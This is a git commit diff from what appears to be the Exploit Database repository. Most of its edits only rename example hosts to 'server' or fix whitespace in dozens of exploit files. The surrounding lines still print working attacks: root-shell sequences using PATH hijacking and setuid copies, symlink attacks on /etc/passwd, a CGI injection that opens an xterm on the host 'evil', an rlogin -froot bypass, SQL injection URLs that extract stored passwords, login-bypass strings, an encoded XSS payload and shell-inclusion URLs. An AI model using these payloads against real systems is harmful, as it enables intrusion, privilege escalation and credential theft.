DB: 2016-09-03
14 new exploits Too many to list!
This commit is contained in:
Offensive Security
parent
f96ddba143
commit
31a21bb68d
8960 changed files with 12206 additions and 12354 deletions
|
|
@ -74,7 +74,7 @@ if len(sys.argv) < 3:
|
|||
|
||||
print " "
|
||||
|
||||
print ' usage: %s http://server.com/path/ day-mounth-year' % os.path.basename(sys.argv[0])
|
||||
print ' usage: %s http://server/path/ day-mounth-year' % os.path.basename(sys.argv[0])
|
||||
|
||||
print " "
|
||||
|
||||
|
|
@ -88,7 +88,7 @@ if len(sys.argv) < 3:
|
|||
|
||||
print "_______________________________________________________________"
|
||||
|
||||
sys.exit("\nexample: http://www.server.com/ 16-10-2010")
|
||||
sys.exit("\nexample: http://server/ 16-10-2010")
|
||||
|
||||
|
||||
|
||||
|
|
|
|||
|
|
@ -13,4 +13,4 @@ $ set PATH=/tmp:$PATH
|
|||
$ export PATH
|
||||
$ /usr/bin/winstall
|
||||
$ /tmp/sh
|
||||
#
|
||||
#
|
||||
|
|
@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/59/info
|
|||
/etc/crash was installed setgid kmem and excutable by anyone. Any user can use the ! shell command escape to executes commands, which are then performed with group set to kmem.
|
||||
|
||||
$ /etc/crash
|
||||
! sh
|
||||
! sh
|
||||
|
|
@ -12,4 +12,4 @@ HELO XXXXXXXXXXX[....several hundered of these....]XXXXXXXX
|
|||
[ and it just hangs ]
|
||||
|
||||
$ ping some.where
|
||||
[ ...nothing... ]
|
||||
[ ...nothing... ]
|
||||
|
|
@ -7,4 +7,4 @@ $ nmap -p 1-64000 -i <target host>
|
|||
|
||||
It is also claimed inetd will die if the Windows 95/NT
|
||||
program postscan.exe, made by 7thsphere, is run againts
|
||||
the host.
|
||||
the host.
|
||||
|
|
@ -14,15 +14,15 @@ and no any filter for html code at robots.lib.php. you can inject your html code
|
|||
|
||||
html inj.:
|
||||
|
||||
target.com/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME(orwriteyourindexcode)&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=
|
||||
server/robotstats/admin/robots.php?rub=ajouter&nom=<font color=red size=10><body bgcolor=black>NiCKNAME(orwriteyourindexcode)&actif=1&user_agent=writeanything(orhtmlcode)&ip1=&ip2=&detection=detection_user_agent&descr_fr=&descr_en=&url=
|
||||
|
||||
after you go here:
|
||||
|
||||
target.com/robotstats/info-robot.php?robot=(robot id)
|
||||
server/robotstats/info-robot.php?robot=(robot id)
|
||||
|
||||
or
|
||||
|
||||
target.com/robotstats/admin/robots.php you will see your html page
|
||||
server/robotstats/admin/robots.php you will see your html page
|
||||
|
||||
analysis: (/admin/robots.php)
|
||||
|
||||
|
|
|
|||
|
|
@ -11,4 +11,4 @@ ln -s /etc/passwd /tmp/fwlsuser.$x
|
|||
let x=$x+1
|
||||
echo $x
|
||||
done
|
||||
exit
|
||||
exit
|
||||
|
|
@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/375/info
|
|||
|
||||
The snap command is a diagnostic utlitiy for gathering system information on AIX platforms. It can only be executed by root, but it copies various system files into /tmp/ibmsupt/ under /tmp/ibmsupt/general/ you will find the passwd file with cyphertext. The danger here is if a system administrator executes snap -a as sometimes requested by IBM support while diagnosing a problem it defeats password shadowing. /tmp/ibmsupt is created with 755 permissions they may carry out a symlink attack and gain access to the password file.
|
||||
|
||||
snap is a shell script which uses cp -p to gather system information. Data from /etc/security is gathered between lines 721 - 727. Seeing that snap uses the /tmp/ibmsupt/general directory someone may create the directory as a normal user (tested on on AIX 4.2.1). The user may then do a touch on /tmp/ibmsupt/general/passwd. Once the passwd file is created do tail -f /tmp/ibmsupt/general/passwd. If in another session someone loggs in as root and ran snap -a - this will cause the contents of the /etc/security/passwd to show up in tail command.
|
||||
snap is a shell script which uses cp -p to gather system information. Data from /etc/security is gathered between lines 721 - 727. Seeing that snap uses the /tmp/ibmsupt/general directory someone may create the directory as a normal user (tested on on AIX 4.2.1). The user may then do a touch on /tmp/ibmsupt/general/passwd. Once the passwd file is created do tail -f /tmp/ibmsupt/general/passwd. If in another session someone loggs in as root and ran snap -a - this will cause the contents of the /etc/security/passwd to show up in tail command.
|
||||
|
|
@ -26,4 +26,4 @@ echo "cheezy mail hack" | rmail joeuser@nohost.com
|
|||
unsetenv IFS
|
||||
rm -f usr sh # minor cleanup.
|
||||
echo "Attempting to run sgid shell."
|
||||
./mailsh
|
||||
./mailsh
|
||||
|
|
@ -3,4 +3,4 @@ source: http://www.securityfocus.com/bid/455/info
|
|||
There exists a vulnerability in the lquerypv command under AIX. By using the '-h' flaq, a user may read any file on the file system in hex format.
|
||||
|
||||
|
||||
/usr/sbin/lquerypv -h /pathtofilename
|
||||
/usr/sbin/lquerypv -h /pathtofilename
|
||||
|
|
@ -4,4 +4,4 @@ The sgihelp program, from SGI and included with IRIX 5.1 and 5.2, contains a vul
|
|||
|
||||
Run PrintStatus
|
||||
Press the 'help' button.
|
||||
Select the 'print to command' option. This will allow you to execute anything as root.
|
||||
Select the 'print to command' option. This will allow you to execute anything as root.
|
||||
|
|
@ -7,4 +7,4 @@ gcc -g -o a.out hello-world.c
|
|||
$ adb a.out -
|
||||
adb
|
||||
.main,5:s
|
||||
a.out: running
|
||||
a.out: running
|
||||
|
|
@ -14,4 +14,4 @@ chmod u+s /tmp/.shh
|
|||
EOF
|
||||
chmod a+x /tmp/aap/bin/Dctrl
|
||||
lsmcode
|
||||
/tmp/.shh
|
||||
/tmp/.shh
|
||||
|
|
@ -4,4 +4,4 @@ IBM AIX is prone to a local vulnerability in getShell and getCommand. This issue
|
|||
|
||||
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd
|
||||
-bash-3.00$./getCommand.new ../../../../../../etc/security/passwd.aa
|
||||
fopen: No such file or directory
|
||||
fopen: No such file or directory
|
||||
|
|
@ -8,4 +8,4 @@ IBM AIX is prone to a local vulnerability in getShell and getCommand. This vulne
|
|||
|
||||
ps -ef > /tmp/log. $$
|
||||
grep test /tmp/log.
|
||||
$$ rm /tmp/log. $$
|
||||
$$ rm /tmp/log. $$
|
||||
|
|
@ -13,4 +13,4 @@ xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
|||
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
||||
xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
|
||||
xxxxxxxxxxx
|
||||
[dead]
|
||||
[dead]
|
||||
|
|
@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/64/info
|
|||
|
||||
There exists a security vulnerability with the CGI program pfdispaly.cgi distributed with IRIX. This problem its not fixed by patch 3018.
|
||||
|
||||
$ lynx -dump http://victim/cgi-bin/pfdisplay.cgi?'%0A/usr/bin/X11/xterm%20-display%20evil:0.0|'
|
||||
$ lynx -dump http://victim/cgi-bin/pfdisplay.cgi?'%0A/usr/bin/X11/xterm%20-display%20evil:0.0|'
|
||||
|
|
@ -4,4 +4,4 @@ NTMail v3.X is susceptible to being used as a mail relay for SPAM or other unsol
|
|||
|
||||
Gordano's own JUCE product (to prevent mail relay attacks and other SPAM activity) will not prevent NTMAIL v.3.x from being used as a mail relay.
|
||||
|
||||
Specify <> in the 'Mail From' field.
|
||||
Specify <> in the 'Mail From' field.
|
||||
|
|
@ -2,4 +2,4 @@ source: http://www.securityfocus.com/bid/458/info
|
|||
|
||||
A problem with the way login parses arguments as passed by rlogind that may allow access to the root account.
|
||||
|
||||
%rlogin -froot targethost.com
|
||||
%rlogin -froot targethost.com
|
||||
|
|
@ -12,7 +12,7 @@
|
|||
|
||||
[~] 1.Save code html format
|
||||
|
||||
[~] 2.Search Target.com
|
||||
[~] 2.Search server
|
||||
|
||||
[~] 3.Edit and replace & Target
|
||||
|
||||
|
|
@ -26,7 +26,7 @@
|
|||
|
||||
[~] 8.Formats can be uploaded (Html.Htm.Jpg.gif.Xml....)
|
||||
|
||||
[~] 9.Target.com/images/uploads/File/File Name
|
||||
[~] 9.server/images/uploads/File/File Name
|
||||
|
||||
[~]######################################### ExploiT
|
||||
#############################################[~]
|
||||
|
|
@ -62,7 +62,7 @@ Connector:<br />
|
|||
<option value="lasso/connector.lasso">Lasso</option>
|
||||
<option value="perl/connector.cgi">Perl</option>
|
||||
<option value="
|
||||
http://Target.com/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php
|
||||
http://server/includes/FCKeditor/editor/filemanager/browser/default/connectors/php/connector.php
|
||||
">PHP</option>
|
||||
<option value="py/connector.py">Python</option>
|
||||
</select>
|
||||
|
|
|
|||
|
|
@ -6,4 +6,4 @@ Successful exploits will allow attacker-supplied HTML and script code to run in
|
|||
|
||||
TaxiMonger 2.6.2 and 2.3.3 are vulnerable; other versions may also be affected.
|
||||
|
||||
<Script Language='Javascript'> <!-- document.write(unescape('%3C%69%6D%61%67%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%76%75%6C%6E%2D%6C%61%62 %2E%63%6F%6D%20%6F%6E%65%72%72%6F%72%3D%61%6C%65%72%74%28%27%69%73%6D%61%69%6C%6B%61%6C%65%65%6D%27%29%20%2F%3E')); //--> </Script>
|
||||
<Script Language='Javascript'> <!-- document.write(unescape('%3C%69%6D%61%67%65%20%73%72%63%3D%68%74%74%70%3A%2F%2F%76%75%6C%6E%2D%6C%61%62 %2E%63%6F%6D%20%6F%6E%65%72%72%6F%72%3D%61%6C%65%72%74%28%27%69%73%6D%61%69%6C%6B%61%6C%65%65%6D%27%29%20%2F%3E')); //--> </Script>
|
||||
|
|
@ -46,4 +46,4 @@
|
|||
|
||||
************************************************************
|
||||
|
||||
************************************************************
|
||||
************************************************************
|
||||
|
|
@ -23,4 +23,4 @@ soap:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/">
|
|||
<Item>0</Item>
|
||||
</tns:ArrayOfint>
|
||||
</soap:Body>
|
||||
</soap:Envelope>
|
||||
</soap:Envelope>
|
||||
|
|
@ -4,4 +4,4 @@ Sigma Portal is prone to a denial-of-service vulnerability.
|
|||
|
||||
Attackers can exploit this issue to cause the server to consume excessive resources, denying service to legitimate users.
|
||||
|
||||
http://www.example.com/Portal/Picture/ShowObjectPicture.aspx?Width=%27910000&Height=1099000-=&ObjectType=News&ObjectID=(Picture ID)
|
||||
http://www.example.com/Portal/Picture/ShowObjectPicture.aspx?Width=%27910000&Height=1099000-=&ObjectType=News&ObjectID=(Picture ID)
|
||||
|
|
@ -30,7 +30,7 @@ if (@ARGV < 2)
|
|||
print " 2 ==> Version 1.36, 2.0 and Next\n";
|
||||
print "==========================================\n\n";
|
||||
print "Example:\n\n";
|
||||
print " Max.pl www.Site.com 1\n";
|
||||
print " Max.pl www.server 1\n";
|
||||
exit();
|
||||
}
|
||||
$hell = "foo' or M_Name='admin";
|
||||
|
|
|
|||
|
|
@ -7,7 +7,7 @@ Alphast , IHS Team , Shabgard Security Team , Emperor Hacking TEam
|
|||
----------------Discovered by: s d <irsdl@yahoo.com>------------------------------------------
|
||||
*/
|
||||
# Config ________________________________
|
||||
# address - example: http://www.site.com/password.asp
|
||||
# address - example: http://www.server/password.asp
|
||||
$url = "http://www.mohamad.com/password.asp";
|
||||
$mh = "s1";
|
||||
# if webmaxportal version is : Version 1.35 and older please input $mh= "s1"
|
||||
|
|
|
|||
|
|
@ -23,4 +23,4 @@ http://server/default.asp?catid=39+UNION%20SELECT%201,2,3,4,5,6,7,8,9,10,11,12,1
|
|||
Greetz :
|
||||
WwW.IQ-ty.CoM
|
||||
|
||||
| CraCkEr | Cyber-Zone | str0ke | jiko
|
||||
| CraCkEr | Cyber-Zone | str0ke | jiko
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
_ _ _ _ _ _ _ _ _ _ _ _ _ _ __ _ _ _ _ _____1337~h4x0rZ__ _ ___ ___
|
||||
_ _ _ _ _ _ _ _ _ _ _ _ _ _ __ _ _ _ _ _____1337~h4x0rZ__ _ ___ ___
|
||||
/_/Rd_ _ / _ _\/ _ _ / \ \< |/_ _ / /\ | \ /\ || \( ) /\ | \ (| |
|
||||
\_ _ _ _/ /_ _ / / __ | () / | | / / [d0t]com/@~\ | (O) / /+~\ ||_O_|( ) /0O\ | \ | |
|
||||
_ _ _ _\ \_ _ \ \ _ _ _ | \ | | / /_ _ /|__|\ | \ /|__|\|| O |( ) /+__+\| ^ \ | |
|
||||
|
|
|
|||
|
|
@ -15,7 +15,7 @@
|
|||
|
||||
[*] Err0r C0N50L3:
|
||||
|
||||
[*] www.target.com/player.asp?player_id={EV!L BL!ND INJ}
|
||||
[*] server/player.asp?player_id={EV!L BL!ND INJ}
|
||||
|
||||
|
||||
[*] EV!L BL!ND
|
||||
|
|
|
|||
|
|
@ -15,7 +15,7 @@
|
|||
|
||||
[*] Err0r C0N50L3:
|
||||
|
||||
[*] www.target.com/[path]/admin/edit.asp?ID={EV!L blind sql}
|
||||
[*] server/[path]/admin/edit.asp?ID={EV!L blind sql}
|
||||
|
||||
|
||||
[*] EV!L BL!ND sql
|
||||
|
|
|
|||
|
|
@ -15,7 +15,7 @@
|
|||
|
||||
[*] Err0r C0N50L3:
|
||||
|
||||
[*] www.target.com/[path]/campaignEdit.asp?CCam={EV!L blind sql}
|
||||
[*] server/[path]/campaignEdit.asp?CCam={EV!L blind sql}
|
||||
|
||||
|
||||
[*] EV!L BL!ND sql
|
||||
|
|
|
|||
|
|
@ -67,4 +67,4 @@ Thanks You: eXceptioN,CodeInside,CorDoN,Hack3ra,Rex aL0ne,By_HKC
|
|||
|
||||
|
||||
|
||||
###########################################################################
|
||||
###########################################################################
|
||||
|
|
@ -24,7 +24,7 @@ if (@ARGV < 1)
|
|||
print " Usage:ASPNuke.pl <T4rg3t> \n\n";
|
||||
print "==========================================\n\n";
|
||||
print "Examples:\n\n";
|
||||
print " ASPNuke.pl www.Site.com \n";
|
||||
print " ASPNuke.pl www.server \n";
|
||||
exit();
|
||||
}
|
||||
|
||||
|
|
|
|||
|
|
@ -1,4 +1,4 @@
|
|||
#####################################################
|
||||
#####################################################
|
||||
# [+] Author : RENO #
|
||||
# [+] Email : R7e@HoTMaiL.coM #
|
||||
# [+] Site : www.vxx9.cc #
|
||||
|
|
|
|||
|
|
@ -1,4 +1,4 @@
|
|||
#####################################################
|
||||
#####################################################
|
||||
# [+] Author : RENO #
|
||||
# [+] Email : R7e@HoTMaiL.coM #
|
||||
# [+] Site : www.vxx9.cc #
|
||||
|
|
|
|||
|
|
@ -26,7 +26,7 @@
|
|||
|
||||
[ª]dem0:
|
||||
|
||||
http://www.site.com/?page=details&newsID=1905+union+select+1,pword,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users
|
||||
http://www.server/?page=details&newsID=1905+union+select+1,pword,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17+from+users
|
||||
|
||||
Admin:[Path]/admin/login.asp
|
||||
|
||||
|
|
|
|||
|
|
@ -8,5 +8,5 @@
|
|||
# Risk: Medium
|
||||
#################################################################
|
||||
# Vulnerability:
|
||||
# http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..
|
||||
# http://server/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir =./..
|
||||
#################################################################
|
||||
|
|
|
|||
|
|
@ -8,7 +8,7 @@ Vulnerability:
|
|||
=======================
|
||||
Arbitrary File Upload
|
||||
=======================
|
||||
<form action = "http://site.com/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data ">
|
||||
<form action = "http://server/manage/ewebeditor/upload.asp?action=save&type=IMAGE&style=luoye 'union select S_ID, S_Name, S_Dir, S_CSS, [S_UploadDir]% 2b' / .. / db ', S_Width, S_Height, S_Memo, S_IsSys, S_FileExt, S_FlashExt, [S_ImageExt]% 2b' | asa ', S_MediaExt, S_FileSize, S_FlashSize, S_ImageSize, S_MediaSize, S_StateFlag, S_DetectFromWord, S_InitMode, S_BaseUrl from ewebeditor_style where s_name =' standard 'and'a' = 'a "method = post name = myform enctype =" multipart / form-data ">
|
||||
<p align="center">
|
||||
<input type=file name=uploadfile size=100><br> <br>
|
||||
<input type=submit value=Upload> </p>
|
||||
|
|
@ -18,19 +18,19 @@ Arbitrary File Upload
|
|||
=======================
|
||||
Arbitrary File Upload 2
|
||||
=======================
|
||||
http://site.com/admin/ewebeditor/ewebeditor.htm?id=body&style=popup
|
||||
http://server/admin/ewebeditor/ewebeditor.htm?id=body&style=popup
|
||||
|
||||
|
||||
=======================
|
||||
Database Disclosure
|
||||
=======================
|
||||
http://site.com/ewebeditor/db/ewebeditor.mdb
|
||||
http://server/ewebeditor/db/ewebeditor.mdb
|
||||
|
||||
|
||||
=======================
|
||||
Administrator bypass
|
||||
=======================
|
||||
http://site.com/eWebEditor/admin/login.asp
|
||||
http://server/eWebEditor/admin/login.asp
|
||||
|
||||
put this code instead URL
|
||||
javascript: alert (document.cookie = "adminpass =" + escape ( "admin"));
|
||||
|
|
@ -39,11 +39,11 @@ javascript: alert (document.cookie = "adminpass =" + escape ( "admin"));
|
|||
=======================
|
||||
Directory Traversal
|
||||
=======================
|
||||
http://site.com/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..
|
||||
http://server/admin/ewebeditor/admin/upload.asp?id=16&d_viewmode=&dir=./..
|
||||
|
||||
|
||||
=======================
|
||||
Directory Traversal 2
|
||||
=======================
|
||||
http://site.com/ewebeditor/asp/browse.asp?style=standard650&dir=./..
|
||||
http://server/ewebeditor/asp/browse.asp?style=standard650&dir=./..
|
||||
|
||||
|
|
|
|||
|
|
@ -1,4 +1,4 @@
|
|||
#######################################################################
|
||||
#######################################################################
|
||||
# #
|
||||
### DA Mailing List System V2 Remote Admin Login Exploit ###
|
||||
# #
|
||||
|
|
|
|||
|
|
@ -70,4 +70,4 @@ CoreLabs, the research center of Core Security Technologies, is charged with ant
|
|||
Core Security Technologies develops strategic solutions that help security-conscious organizations worldwide develop and maintain a proactive process for securing their networks. The company's flagship product, CORE IMPACT, is the most comprehensive product for performing enterprise security assurance testing. CORE IMPACT evaluates network, endpoint and end-user vulnerabilities and identifies what resources are exposed. It enables organizations to determine if current security investments are detecting and preventing attacks. Core Security Technologies augments its leading technology solution with world-class security consulting services, including penetration testing and software security auditing. Based in Boston, MA and Buenos Aires, Argentina, Core Security Technologies can be reached at 617-399-6980 or on the Web at http://www.coresecurity.com.
|
||||
12. Disclaimer
|
||||
|
||||
The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.
|
||||
The contents of this advisory are copyright (c) 2010 Core Security Technologies and (c) 2010 CoreLabs, and may be distributed freely provided that no fee is charged for this distribution and proper credit is given.
|
||||
|
|
@ -29,4 +29,4 @@
|
|||
*""""""""""""""""""""
|
||||
** Greetz to : ALLAH
|
||||
** All Members of http://www.DZ4All.cOm/Cc
|
||||
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & n2n & .....
|
||||
** And My BrOther AnGeL25dZ & yasMouh & ProToCoL & Mr.Benladen & n2n & .....
|
||||
|
|
@ -36,4 +36,4 @@ Dağları deviriverdin üstüme hiç çekinmedin
|
|||
Ben bu şehirde bir daha da sabah görmedim
|
||||
Günaydınlar olmadı günler aymadı sensiz ........
|
||||
|
||||
-------------------------------------------------------------------------------------------
|
||||
-------------------------------------------------------------------------------------------
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
=========================================
|
||||
=========================================
|
||||
Web Wiz Forums 9.68 SQLi Vulnerability
|
||||
=========================================
|
||||
|
||||
|
|
@ -22,9 +22,9 @@ Xploit: SQLi Vulnerability
|
|||
|
||||
DEMO URL:
|
||||
|
||||
http://site.com/new_reply_form.asp?TID=[SQLi]
|
||||
http://server/new_reply_form.asp?TID=[SQLi]
|
||||
|
||||
|
||||
###############################################################################################################
|
||||
# 0day no more
|
||||
# Sid3^effects
|
||||
# Sid3^effects
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
======================================================
|
||||
======================================================
|
||||
Virtual Real Estate Manager V 3.5 SQLi Vulnerability
|
||||
======================================================
|
||||
|
||||
|
|
@ -27,4 +27,4 @@ DEMO URL:
|
|||
|
||||
###############################################################################################################
|
||||
# 0day no more
|
||||
# Sid3^effects
|
||||
# Sid3^effects
|
||||
|
|
@ -22,9 +22,9 @@ Xploit: SQLi Vulnerability
|
|||
|
||||
DEMO URL:
|
||||
|
||||
http://site.com/reallusiontv/ic/productdemo.asp?page=[SQLi]
|
||||
http://server/reallusiontv/ic/productdemo.asp?page=[SQLi]
|
||||
|
||||
|
||||
###############################################################################################################
|
||||
# 0day no more
|
||||
# Sid3^effects
|
||||
# Sid3^effects
|
||||
|
|
@ -42,7 +42,7 @@ Admin Control:
|
|||
Usename:admin
|
||||
Password:admin
|
||||
|
||||
DEMO URL :http://site.com/onlinenotebookmanager.asp?ItemID=[SQLi]
|
||||
DEMO URL :http://server/onlinenotebookmanager.asp?ItemID=[SQLi]
|
||||
|
||||
|
||||
-----------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------
|
||||
|
|
|
|||
|
|
@ -18,7 +18,7 @@
|
|||
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-=-=-=-=-=-=-=1
|
||||
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
|
||||
Exploit Title:Smart ASP Survey SQL & XSS Vulnerable
|
||||
Vendor url:http://www.sellatsite.com
|
||||
Vendor url:http://www.sellatserver
|
||||
Version:n/a
|
||||
Published: 2010-06-15
|
||||
Greetz to:Sid3^effects, MaYur, M4n0j, Dark Blue, S1ayer,d3c0d3r,KD and to
|
||||
|
|
|
|||
|
|
@ -19,7 +19,7 @@
|
|||
|
||||
Author: L0rd CrusAd3r aka VSN [crusader_hmg@yahoo.com]
|
||||
Exploit Title:SAS Hotel Management System SQL Vulnerable
|
||||
Vendor url:http://www.sellatsite.com
|
||||
Vendor url:http://www.sellatserver
|
||||
Version:n/a
|
||||
Price:28$
|
||||
Published: 2010-06-15
|
||||
|
|
|
|||
|
|
@ -32,4 +32,4 @@ Sex
|
|||
|
||||
Crew : IMHATIMI.ORG ~ MecTruy ~ Dr.Ly0n ~ Noxy ~ FreWaL
|
||||
|
||||
##################################################################################
|
||||
##################################################################################
|
||||
|
|
@ -17,9 +17,9 @@
|
|||
|
||||
---
|
||||
|
||||
http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
|
||||
http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?sayfaid=[shell]
|
||||
http://www.site.com/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
|
||||
http://www.server/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
|
||||
http://www.server/sablonlar/gunaysoft/gunaysoft.php?sayfaid=[shell]
|
||||
http://www.server/sablonlar/gunaysoft/gunaysoft.php?uzanti=[shell]
|
||||
|
||||
---
|
||||
|
||||
|
|
@ -100,7 +100,7 @@ print q
|
|||
Usage:
|
||||
perl phportal.pl <Target website> <Shell Location> <CMD Variable> <-r> <-p>
|
||||
<Target Website> - Path to target eg: www.victim.com
|
||||
<Shell Location> - Path to shell eg: http://site.com/r57.txt?
|
||||
<Shell Location> - Path to shell eg: http://server/r57.txt?
|
||||
<CMD Variable> - Shell command variable name eg: Pwd
|
||||
<r> - Show output from shell
|
||||
<p> - sablonlar/gunaysoft/gunaysoft.php
|
||||
|
|
|
|||
|
|
@ -12,7 +12,7 @@ if (@ARGV < 3)
|
|||
print q(
|
||||
+++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
Usage: perl mini-nuke.pl [site] [dir] [useId] [proxy (optional)]
|
||||
i.e. perl mini-nuke.pl "somesite.com" / 52 127.0.0.1:3128
|
||||
i.e. perl mini-nuke.pl "someserver" / 52 127.0.0.1:3128
|
||||
++++++++++++++++++++++++++++++++++++++++++++++++++++
|
||||
);
|
||||
exit;
|
||||
|
|
|
|||
|
|
@ -18,4 +18,4 @@ http://server/main.asp?id=5945&grp=[SQL Injection]
|
|||
|
||||
|
||||
[~]######################################### FinisH :D #############################################[~]
|
||||
|
||||
|
||||
|
|
@ -27,11 +27,11 @@ i-Gallery is a complete online photo gallery. Easy to navigate thumbnails with p
|
|||
#######################################################################################################
|
||||
Xploit :Arbitrary File Include Vulnerabilty
|
||||
|
||||
DEMO URL http://www.site.com/igallery34/viewphoto.asp?i=[file include]&f=fghd&sh=27768&sw=1024
|
||||
DEMO URL http://www.server/igallery34/viewphoto.asp?i=[file include]&f=fghd&sh=27768&sw=1024
|
||||
|
||||
Xploit :Persistent XSS Vulnerabilty
|
||||
|
||||
DEMO URL http://www.site.com/igallery34/submitphotos.asp?mi=1
|
||||
DEMO URL http://www.server/igallery34/submitphotos.asp?mi=1
|
||||
|
||||
|
||||
|
||||
|
|
|
|||
|
|
@ -11,11 +11,11 @@ Dork : inurl:hikaye.asp?id=
|
|||
|
||||
===================================================
|
||||
|
||||
[+] Vulnerable File : http://www.site.com/hikaye.asp?id=123
|
||||
[+] Vulnerable File : http://www.server/hikaye.asp?id=123
|
||||
|
||||
===================================================
|
||||
|
||||
[+] Demo : http://www.site.com/hikaye.asp?id=17'a
|
||||
[+] Demo : http://www.server/hikaye.asp?id=17'a
|
||||
|
||||
===================================================
|
||||
|
||||
|
|
|
|||
|
|
@ -11,11 +11,11 @@ Dork : inurl:makaledetay.asp?id=
|
|||
|
||||
===================================================
|
||||
|
||||
[+] Vulnerable File : http://www.site.com/makaledetay.asp?id=123
|
||||
[+] Vulnerable File : http://www.server/makaledetay.asp?id=123
|
||||
|
||||
===================================================
|
||||
|
||||
[+] Demo : http://www.site.com/makaledetay.asp?id=15%27a
|
||||
[+] Demo : http://www.server/makaledetay.asp?id=15%27a
|
||||
|
||||
===================================================
|
||||
|
||||
|
|
|
|||
|
|
@ -13,14 +13,14 @@ Dork : :/ sorry
|
|||
|
||||
[+] Vulnerable File :
|
||||
|
||||
http://www.site.com/default.asp?islem=devami&id=38%20union+select+all+0,
|
||||
http://www.server/default.asp?islem=devami&id=38%20union+select+all+0,
|
||||
sifre,2,3%20,4,5+from+aky_ayarlar
|
||||
|
||||
===================================================
|
||||
|
||||
[+] Demo :
|
||||
|
||||
http://www.site.com/blog/default.asp?islem=devami&id=38%20union+s
|
||||
http://www.server/blog/default.asp?islem=devami&id=38%20union+s
|
||||
elect+all+0,sifre,2,3%20,4,5+from+aky_ayarlar
|
||||
|
||||
===================================================
|
||||
|
|
@ -31,4 +31,4 @@ and all www.worldhackerz.com Member
|
|||
|
||||
===================================================
|
||||
|
||||
# Turkish P0wer
|
||||
# Turkish P0wer
|
||||
|
|
@ -1,4 +1,4 @@
|
|||
=======================================
|
||||
=======================================
|
||||
netStartEnterprise v4.0 SQL Injection Vulnerability
|
||||
=======================================
|
||||
|
||||
|
|
@ -15,7 +15,7 @@
|
|||
|
||||
# Version: netStartEnterprise v4.0
|
||||
|
||||
# Path: http://www.site.com/previeweventdetail.aspx?id=[SQL]
|
||||
# Path: http://www.server/previeweventdetail.aspx?id=[SQL]
|
||||
|
||||
# Platform: ASP
|
||||
|
||||
|
|
|
|||
|
|
@ -84,7 +84,7 @@ sub usage()
|
|||
{
|
||||
head();
|
||||
print " Usage: Thaisql.pl <Site> \r\n\n";
|
||||
print " <Site> - Full path to Guestbook e.g. http://www.site.com/guestbook/ \r\n";
|
||||
print " <Site> - Full path to Guestbook e.g. http://www.server/guestbook/ \r\n";
|
||||
print "=======================================================================\r\n";
|
||||
print " -=Coded by Zodiac, Bug Found by MurderSkillz=-\r\n";
|
||||
print "www.exploitercode.com www.g00ns.net irc.g00ns.net #g00ns\r\n";
|
||||
|
|
|
|||
|
|
@ -11,10 +11,10 @@ Vulnerability : (Auth Bypass) SQL Injection Vulnerability
|
|||
[Auth Bypass]:
|
||||
user: pouya
|
||||
pass: ' or '
|
||||
admin page : http://site.com/[path]/admin.asp
|
||||
admin page : http://server/[path]/admin.asp
|
||||
---------------------------------
|
||||
Victem :
|
||||
http://www.etoshop.com/demo/pcstore
|
||||
---------------------------------------------------------
|
||||
#########################################################
|
||||
|
||||
|
||||
|
|
@ -123,4 +123,3 @@ Persistent XSS Vulnerabilities:
|
|||
|
||||
|
||||
===========================================================================================
|
||||
|
||||
|
|
@ -43,7 +43,7 @@ Step 1) Login into member or User Section
|
|||
|
||||
Link:
|
||||
|
||||
http://www.site.com/dmxreadyv2/membersareamanager/membersareamanager.asp?show=login-member
|
||||
http://www.server/dmxreadyv2/membersareamanager/membersareamanager.asp?show=login-member
|
||||
|
||||
Step 2) Go to Edit profile
|
||||
|
||||
|
|
@ -66,7 +66,7 @@ Step 3) Enter your Attack Pattern
|
|||
Step 4) Refresh and View User profile
|
||||
|
||||
Demo Url:-
|
||||
